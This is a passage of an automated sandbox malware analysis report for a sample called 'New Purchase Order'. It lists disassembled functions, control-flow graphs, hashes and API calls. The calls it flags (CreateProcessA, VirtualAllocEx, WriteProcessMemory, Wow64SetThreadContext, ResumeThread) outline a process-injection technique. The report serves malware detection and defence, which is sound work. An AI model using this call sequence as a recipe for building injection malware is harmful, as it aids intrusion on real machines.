814ea11-814ea13 1042->1046 1047 814ea0f 1042->1047 1048 814ea23-814ea30 1043->1048 1049 814ea7a-814eac3 1043->1049 1045->1045 1046->1043 1047->1043 1053 814ea66-814ea73 1048->1053 1054 814ea32-814ea64 1048->1054 1049->966 1053->1049 1054->1053
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N7B
                                                          • API String ID: 0-3344257597
                                                          • Opcode ID: f53d2005fb897ec0265c156e330aa6bbab2382b4b9bbd376dca0512e553f2c92
                                                          • Instruction ID: 8b3760fc422b6d28b5dc6756018b712bc7b3394497d6ef677db50890e3ddacef
                                                          • Opcode Fuzzy Hash: f53d2005fb897ec0265c156e330aa6bbab2382b4b9bbd376dca0512e553f2c92
                                                          • Instruction Fuzzy Hash: C7329A74B012148FDB19DB79D850BAEBBF6BF89212F24446DE546DB390CB34E902CB61
                                                          Function 0312225D Relevance: .2, Instructions: 237COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c20300c2ff2661793eb93c6d136c03e6f2a86fa7dcb556928a76b6fff189dae
                                                          • Instruction ID: 2b16e1d10f6342865fb03b8e121bec5c65b6efa960663fad3bdff2d2aac1418e
                                                          • Opcode Fuzzy Hash: 6c20300c2ff2661793eb93c6d136c03e6f2a86fa7dcb556928a76b6fff189dae
                                                          • Instruction Fuzzy Hash: EE912532A08261CFD799CF28C4909ADBFB5BF8E3107974992D8419F156C730E9A3CB85
                                                          Function 031222E0 Relevance: .2, Instructions: 190COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 548b3700cdbc40b9f67b0faa3b17b593f1aed8c918ae0c85aa1e9fc34fb0e3d2
                                                          • Instruction ID: abea5533943063f1e996fa62d30f9b9dc8e70eb8dcc02fd91d541d253ddd4356
                                                          • Opcode Fuzzy Hash: 548b3700cdbc40b9f67b0faa3b17b593f1aed8c918ae0c85aa1e9fc34fb0e3d2
                                                          • Instruction Fuzzy Hash: 47718471A04221CFD798CF18C59086D7FB5BB9D300B938896D8059F255D734E9A2CB99
                                                          Function 0814C7E8 Relevance: .2, Instructions: 189COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 872d10d366d6dbc4263d8584a0615403e6dcac32339d8c307407b99a3b9940e5
                                                          • Instruction ID: 7f7affd84a80aa280b09e3b5d72297b1454a42724d7175549574a5a5c8e9d952
                                                          • Opcode Fuzzy Hash: 872d10d366d6dbc4263d8584a0615403e6dcac32339d8c307407b99a3b9940e5
                                                          • Instruction Fuzzy Hash: 5D812A71D45219CBEB28CF66C8407E9BBB6BF89301F1091EAD40DA7250DB755A86CF80
                                                          Function 03127488 Relevance: .2, Instructions: 188COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab1f3b52eafca972da3ab232633cb619e865c1813f3886acec18bd0247dd8e98
                                                          • Instruction ID: c3cd27565730903a87b8dcea0c0dd12d22b6c908de46d1023d169820e6fddbdf
                                                          • Opcode Fuzzy Hash: ab1f3b52eafca972da3ab232633cb619e865c1813f3886acec18bd0247dd8e98
                                                          • Instruction Fuzzy Hash: EF61B075B003258BDB18EB78885566EBEEBAFC8200F10C529D40ADF794DF34ED568792
                                                          Function 0312A60B Relevance: .2, Instructions: 187COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f2befc3d997cc4cf9fef64f30ecab3c7121414c0b0cec499ae40b6a8a5ff77af
                                                          • Instruction ID: 5ed08f276616001364b9ef1d65dd84dcf7107750489f6f98229d033bce631573
                                                          • Opcode Fuzzy Hash: f2befc3d997cc4cf9fef64f30ecab3c7121414c0b0cec499ae40b6a8a5ff77af
                                                          • Instruction Fuzzy Hash: E261AE75B003258BDB18EB78C89566E7AEBAFC8200F10C429D40ADF794DF34ED568792
                                                          Function 0814B664 Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1062 814b664-814b705 1065 814b707-814b711 1062->1065 1066 814b73e-814b75e 1062->1066 1065->1066 1067 814b713-814b715 1065->1067 1073 814b797-814b7c6 1066->1073 1074 814b760-814b76a 1066->1074 1068 814b717-814b721 1067->1068 1069 814b738-814b73b 1067->1069 1071 814b725-814b734 1068->1071 1072 814b723 1068->1072 1069->1066 1071->1071 1075 814b736 1071->1075 1072->1071 1080 814b7ff-814b8b9 CreateProcessA 1073->1080 1081 814b7c8-814b7d2 1073->1081 1074->1073 1076 814b76c-814b76e 1074->1076 1075->1069 1078 814b770-814b77a 1076->1078 1079 814b791-814b794 1076->1079 1082 814b77c 1078->1082 1083 814b77e-814b78d 1078->1083 1079->1073 1094 814b8c2-814b948 1080->1094 1095 814b8bb-814b8c1 1080->1095 1081->1080 1084 814b7d4-814b7d6 1081->1084 1082->1083 1083->1083 1085 814b78f 1083->1085 1086 814b7d8-814b7e2 1084->1086 1087 814b7f9-814b7fc 1084->1087 1085->1079 1089 814b7e4 1086->1089 1090 814b7e6-814b7f5 1086->1090 1087->1080 1089->1090 1090->1090 1091 814b7f7 1090->1091 1091->1087 1105 814b958-814b95c 1094->1105 1106 814b94a-814b94e 1094->1106 1095->1094 1108 814b96c-814b970 1105->1108 1109 814b95e-814b962 1105->1109 1106->1105 1107 814b950 1106->1107 1107->1105 1111 814b980-814b984 1108->1111 1112 814b972-814b976 1108->1112 1109->1108 1110 814b964 1109->1110 1110->1108 1114 814b996-814b99d 1111->1114 1115 814b986-814b98c 1111->1115 1112->1111 1113 814b978 1112->1113 1113->1111 1116 814b9b4 1114->1116 1117 814b99f-814b9ae 1114->1117 1115->1114 1119 814b9b5 1116->1119 1117->1116 1119->1119
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0814B8A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 9f128306378412231f9e363bcf1d824607779cbc7c0625fb178bb82e0234bf9f
                                                          • Instruction ID: 8e5cbe3bdfad2b8c345d183db546e4f05e17e769416be38b9666d2a8906002ea
                                                          • Opcode Fuzzy Hash: 9f128306378412231f9e363bcf1d824607779cbc7c0625fb178bb82e0234bf9f
                                                          • Instruction Fuzzy Hash: 2E915F71D04719CFEB24DFA8C8417EDBBB2BF48325F148569E848A7280DB749986CF91
                                                          Function 0814B670 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1120 814b670-814b705 1122 814b707-814b711 1120->1122 1123 814b73e-814b75e 1120->1123 1122->1123 1124 814b713-814b715 1122->1124 1130 814b797-814b7c6 1123->1130 1131 814b760-814b76a 1123->1131 1125 814b717-814b721 1124->1125 1126 814b738-814b73b 1124->1126 1128 814b725-814b734 1125->1128 1129 814b723 1125->1129 1126->1123 1128->1128 1132 814b736 1128->1132 1129->1128 1137 814b7ff-814b8b9 CreateProcessA 1130->1137 1138 814b7c8-814b7d2 1130->1138 1131->1130 1133 814b76c-814b76e 1131->1133 1132->1126 1135 814b770-814b77a 1133->1135 1136 814b791-814b794 1133->1136 1139 814b77c 1135->1139 1140 814b77e-814b78d 1135->1140 1136->1130 1151 814b8c2-814b948 1137->1151 1152 814b8bb-814b8c1 1137->1152 1138->1137 1141 814b7d4-814b7d6 1138->1141 1139->1140 1140->1140 1142 814b78f 1140->1142 1143 814b7d8-814b7e2 1141->1143 1144 814b7f9-814b7fc 1141->1144 1142->1136 1146 814b7e4 1143->1146 1147 814b7e6-814b7f5 1143->1147 1144->1137 1146->1147 1147->1147 1148 814b7f7 1147->1148 1148->1144 1162 814b958-814b95c 1151->1162 1163 814b94a-814b94e 1151->1163 1152->1151 1165 814b96c-814b970 1162->1165 1166 814b95e-814b962 1162->1166 1163->1162 1164 814b950 1163->1164 1164->1162 1168 814b980-814b984 1165->1168 1169 814b972-814b976 1165->1169 1166->1165 1167 814b964 1166->1167 1167->1165 1171 814b996-814b99d 1168->1171 1172 814b986-814b98c 1168->1172 1169->1168 1170 814b978 1169->1170 1170->1168 1173 814b9b4 1171->1173 1174 814b99f-814b9ae 1171->1174 1172->1171 1176 814b9b5 1173->1176 1174->1173 1176->1176
                                                          APIs
                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0814B8A6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID:
                                                          • API String ID: 963392458-0
                                                          • Opcode ID: 6d023eca55487b1691f0fe8009d3e235f49688ec0a4c026c6857a88a920308c9
                                                          • Instruction ID: 1ca2a64a9c334262e3f8ef20ca3624015e2f24242ea24aca63c28fcb2be310ab
                                                          • Opcode Fuzzy Hash: 6d023eca55487b1691f0fe8009d3e235f49688ec0a4c026c6857a88a920308c9
                                                          • Instruction Fuzzy Hash: 02916F71D04719CFEB24CFA8C8417EDBBB2BF48325F148569E808A7280DB749986CF91
                                                          Function 03128F7C Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1285 3128f7c-3129049 CreateActCtxA 1287 3129052-31290ac 1285->1287 1288 312904b-3129051 1285->1288 1295 31290bb-31290bf 1287->1295 1296 31290ae-31290b1 1287->1296 1288->1287 1297 31290d0 1295->1297 1298 31290c1-31290cd 1295->1298 1296->1295 1300 31290d1 1297->1300 1298->1297 1300->1300
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 03129039
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 50dc6026c5137a1474583ca40d7c4f775ff302bf6d3942d35c51101c7712b824
                                                          • Instruction ID: fb228a22ba599da3d9a8c7425989b64b261b43d7ba010fd434afbad8b5dfc87a
                                                          • Opcode Fuzzy Hash: 50dc6026c5137a1474583ca40d7c4f775ff302bf6d3942d35c51101c7712b824
                                                          • Instruction Fuzzy Hash: D641E3B1C0072DCFEB24CFA9C84479DBBB5BF48314F24816AD448AB255D775694ACF90
                                                          Function 03127B0C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1301 3127b0c-3129049 CreateActCtxA 1304 3129052-31290ac 1301->1304 1305 312904b-3129051 1301->1305 1312 31290bb-31290bf 1304->1312 1313 31290ae-31290b1 1304->1313 1305->1304 1314 31290d0 1312->1314 1315 31290c1-31290cd 1312->1315 1313->1312 1317 31290d1 1314->1317 1315->1314 1317->1317
                                                          APIs
                                                          • CreateActCtxA.KERNEL32(?), ref: 03129039
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: Create
                                                          • String ID:
                                                          • API String ID: 2289755597-0
                                                          • Opcode ID: 0b9db7a2e127104b3a8e427fd08092529bc5903379e97bcde939481a8ce6e42d
                                                          • Instruction ID: 375117e5517f1f99e9a5993f2462914dd11d9d12c811982bc3439266d14eb0dd
                                                          • Opcode Fuzzy Hash: 0b9db7a2e127104b3a8e427fd08092529bc5903379e97bcde939481a8ce6e42d
                                                          • Instruction Fuzzy Hash: 1D41C1B1C0072DCFEB24DFA9C844B9EBBB5BF48314F20816AD508AB255DB756946CF90
                                                          Function 0814B3E0 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1318 814b3e0-814b436 1321 814b446-814b485 WriteProcessMemory 1318->1321 1322 814b438-814b444 1318->1322 1324 814b487-814b48d 1321->1324 1325 814b48e-814b4be 1321->1325 1322->1321 1324->1325
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0814B478
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 241ffb760ccb7f7a22733f7d6bd6e599e8d7c1afebcd7e0e1bd27d351ca2a704
                                                          • Instruction ID: bb79cb8c10fb7728139abd8282f81cdffb3a9454ad4e91de7cdadf29a5019c69
                                                          • Opcode Fuzzy Hash: 241ffb760ccb7f7a22733f7d6bd6e599e8d7c1afebcd7e0e1bd27d351ca2a704
                                                          • Instruction Fuzzy Hash: AE213575D003099FDB10DFA9C881BEEBBF5FF48320F14842AE959A7240C7789951CBA4
                                                          Function 0814B3E8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1329 814b3e8-814b436 1331 814b446-814b485 WriteProcessMemory 1329->1331 1332 814b438-814b444 1329->1332 1334 814b487-814b48d 1331->1334 1335 814b48e-814b4be 1331->1335 1332->1331 1334->1335
                                                          APIs
                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0814B478
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessWrite
                                                          • String ID:
                                                          • API String ID: 3559483778-0
                                                          • Opcode ID: 62c69a67f490c32beace6de383c4499f8d18d0b385bf6cbd3af3fde355b9a875
                                                          • Instruction ID: 2d66ec5a9eb35a8593ebdd60f9aa90d3f2d4676fffaea1bd5e92dd2e2813835b
                                                          • Opcode Fuzzy Hash: 62c69a67f490c32beace6de383c4499f8d18d0b385bf6cbd3af3fde355b9a875
                                                          • Instruction Fuzzy Hash: 5D215575D003099FDB10CFAAC881BDEBBF5FF48320F14842AE919A7240C7789941CBA0
                                                          Function 0814B248 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1339 814b248-814b29b 1342 814b29d-814b2a9 1339->1342 1343 814b2ab-814b2db Wow64SetThreadContext 1339->1343 1342->1343 1345 814b2e4-814b314 1343->1345 1346 814b2dd-814b2e3 1343->1346 1346->1345
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0814B2CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: b1c0a2659b15ea0aebb7bf3ad215f7888a50b077c29ca4e3bda10ac4e4549306
                                                          • Instruction ID: adbb0a4f524cce730d2170d4aa008dec060e9baff7b0787a1f79867e465aa26a
                                                          • Opcode Fuzzy Hash: b1c0a2659b15ea0aebb7bf3ad215f7888a50b077c29ca4e3bda10ac4e4549306
                                                          • Instruction Fuzzy Hash: 8A212871D003099FDB10DFAAC485BAEBBF5EF48324F54842AD559A7240CB78A946CFA4
                                                          Function 0814B4D1 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0814B558
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: d9f2818c4914efee27a135468099fffb102deae957a004f654a0f87371d1e998
                                                          • Instruction ID: eaa614d5f6f88b7ee46da462e516ba8cf76cba112ffb8dee1aee9cecf7916977
                                                          • Opcode Fuzzy Hash: d9f2818c4914efee27a135468099fffb102deae957a004f654a0f87371d1e998
                                                          • Instruction Fuzzy Hash: CB21F471C003599FDB10DFAAC881BDEBBF5FF48320F50842AE959A7240C73999018BA4
                                                          Function 0814B250 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0814B2CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: 7c59b64d59a6ef7824540b39a7522b0446c816a1458e2d1b7f494db57f41c697
                                                          • Instruction ID: 824ce9b2dfcb86bd0e2f50e22d55953fb4f93c7660f9e9b6229bdc147b1c54c1
                                                          • Opcode Fuzzy Hash: 7c59b64d59a6ef7824540b39a7522b0446c816a1458e2d1b7f494db57f41c697
                                                          • Instruction Fuzzy Hash: 10210771D003098FDB10DFAAC485BAEBBF5AF48324F54842ED559A7240DB78A945CFA4
                                                          Function 0814B4D8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0814B558
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: ea858cdb43e3f52b74248d94d7c0fe92913546e9c7d4b2d34f52950d7f2772e1
                                                          • Instruction ID: c899537aefa9ee0c5e77df2915b459f987e9b5215c72fcc9b8f32a3fa2eb878b
                                                          • Opcode Fuzzy Hash: ea858cdb43e3f52b74248d94d7c0fe92913546e9c7d4b2d34f52950d7f2772e1
                                                          • Instruction Fuzzy Hash: DD210371C003499FDB10DFAAC881BEEBBF5FF48320F50842AE919A7240C7399901CBA4
                                                          Function 0814B320 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0814B396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 7ae32db7d4246694ed3f5534a859af71cb4b7d1e7e854ff34ca6aeca034663e3
                                                          • Instruction ID: 705e4e94f8a896bf71ddf29298e959bcf950837c339711a5da9dcc02e25e54da
                                                          • Opcode Fuzzy Hash: 7ae32db7d4246694ed3f5534a859af71cb4b7d1e7e854ff34ca6aeca034663e3
                                                          • Instruction Fuzzy Hash: B3115671D003499FDB20DFAAC845BDEBBF5EF88320F10881AE515A7250CB359941CFA0
                                                          Function 0814B328 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0814B396
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: c81cdc4b127f974579efc6f2cf4fe469e6da8dc1a3f10851731acea16cf76cd4
                                                          • Instruction ID: b1aea34d5cd86399f397b67cc4cca76004a82aaeeced14e5246f51959a0e0dbd
                                                          • Opcode Fuzzy Hash: c81cdc4b127f974579efc6f2cf4fe469e6da8dc1a3f10851731acea16cf76cd4
                                                          • Instruction Fuzzy Hash: A8113771D003499FDB20DFAAC845BDEBBF5EF88320F148819E515A7250CB759941CFA0
                                                          Function 0814B198 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 701c93f5d759fbec4fa6056c308d4d9cdcf14f59c75740a2961abd5ace560911
                                                          • Instruction ID: fc15467624cf0eab69beff1fd98ff24c7acd628b5ac1870aa83358aabb7e912c
                                                          • Opcode Fuzzy Hash: 701c93f5d759fbec4fa6056c308d4d9cdcf14f59c75740a2961abd5ace560911
                                                          • Instruction Fuzzy Hash: 51115BB1D003498FDB20DFAAC445B9EFBF5EF88324F248419D519A7240CB35A901CFA4
                                                          Function 0814B1A0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 239dbb22bb9d6f97cb6410c80232fccc450ad027c7433f7d50690f2185934539
                                                          • Instruction ID: 69a8489424d4c84c014d4160a5670db17b195827d9b456fb3b1730935fae4192
                                                          • Opcode Fuzzy Hash: 239dbb22bb9d6f97cb6410c80232fccc450ad027c7433f7d50690f2185934539
                                                          • Instruction Fuzzy Hash: 6F1128B1D003498FDB20DFAAC445B9EFBF5AF88320F148419D519A7240CB75A941CBA4
                                                          Function 0312E938 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312E99E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298602767.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3120000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 97e52aff3473181da50bf61162fa079ea5c0227466deec97d70be2a373a19618
                                                          • Instruction ID: 14e3334c187ff32c293b879473e5e65ef9f06478237f7dc1bb64fb157bc9eb11
                                                          • Opcode Fuzzy Hash: 97e52aff3473181da50bf61162fa079ea5c0227466deec97d70be2a373a19618
                                                          • Instruction Fuzzy Hash: 17110FB5C002598FDB20CF9AC444B9EFBF4AB88324F14842AD869A7250D379A545CFA1
                                                          Function 08149C00 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0814DD65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 4b38cca4d3f6d8d3b80c5e2d50508ee3911bae432b71cc30f343b284f368bf41
                                                          • Instruction ID: 57886dcf5131f7b84609126fb875b3419e082b7ab5355202a674abf71cb384a2
                                                          • Opcode Fuzzy Hash: 4b38cca4d3f6d8d3b80c5e2d50508ee3911bae432b71cc30f343b284f368bf41
                                                          • Instruction Fuzzy Hash: 6F1103B58003499FDB20DF9AD885BDEBBF8EF48324F10845AE518A7740C375A954CFA1
                                                          Function 0814DD01 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0814DD65
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1306942665.0000000008140000.00000040.00000800.00020000.00000000.sdmp, Offset: 08140000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_8140000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: MessagePost
                                                          • String ID:
                                                          • API String ID: 410705778-0
                                                          • Opcode ID: 4c8fa55d399b949da1aa021370193423bae148c461246d25d0c1b79386859525
                                                          • Instruction ID: 13b96b7660432c3c40e463052720b6278ab5cd659f20f22d4b1b614dc50073a9
                                                          • Opcode Fuzzy Hash: 4c8fa55d399b949da1aa021370193423bae148c461246d25d0c1b79386859525
                                                          • Instruction Fuzzy Hash: FA1103B58007499FDB20DF9AD885BDEBFF8EB48320F10841AE559A7240C375A944CFA1
                                                          Function 0197D1FC Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1298235595.000000000197D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0197D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_197d000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e9310d25383b6399f39d686cad29e2a10957a230258bcf0f622164e76af2d47
                                                          • Instruction ID: c9e2ed5882304bb3722ad521a633f0d89d931934967f4a31c6655577ce862458
